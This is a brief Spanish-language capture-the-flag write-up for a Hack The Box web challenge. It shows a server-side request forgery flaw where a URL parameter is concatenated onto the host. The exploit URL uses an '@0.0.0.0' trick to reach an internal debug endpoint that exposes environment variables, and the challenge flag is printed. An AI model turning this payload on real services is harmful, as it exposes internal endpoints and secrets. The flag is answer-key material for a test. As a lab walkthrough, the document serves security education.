Proxyasaservice
Challenge Description
Experience the freedom of the web with ProxyAsAService. Because online privacy and access should be for everyone, everywhere.
Categoria: Web
Dificultad: Fácil
Puntos: 20
Solution
En el codigo identificamos que la aplicacion es vulnerable a SSRF por lo siguiente.
target_url = f'http://{SITE_NAME}{url}'
response, headers = proxy_req(target_url)
La aplicacion esta concatenando el parametro url al sitio original. Nos podemos aprovechar de esto de la siguiente forma.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
http://83.136.251.226:49752/?url=@0.0.0.0:1337/debug/environment
Esto nos redireccionara al localhost y nos dara la flag.
HTB{fl4gs_4s_4_S3rv1c3}